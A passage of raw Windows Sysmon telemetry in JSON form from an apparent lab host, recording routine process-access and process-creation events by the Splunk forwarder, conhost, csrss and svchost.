C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:34.955","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF6-5F25-0000-0010128C0500}","TargetProcessId":"5092","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3612,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.184\r\nProcessGuid: {41C8662E-1FF7-5F25-0000-0010D48E0500}\r\nProcessId: 2456\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\MonitorNoHandle.cmd\" --scheme\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.184","ProcessGuid":"{41C8662E-1FF7-5F25-0000-0010D48E0500}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\system\\bin\\MonitorNoHandle.cmd\" --scheme\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3613,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.173\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 4472\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-0010D48E0500}\r\nTargetProcessId: 2456\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.173","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"4472","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-0010D48E0500}","TargetProcessId":"2456","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3614,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.173\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF7-5F25-0000-0010D48E0500}\r\nTargetProcessId: 2456\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.173","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF7-5F25-0000-0010D48E0500}","TargetProcessId":"2456","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3615,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.173\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.173","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3616,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.173\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.173","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3617,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.173\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.173","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3618,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.173\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.173","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:35","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3619,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:35.173\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:35.173","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C: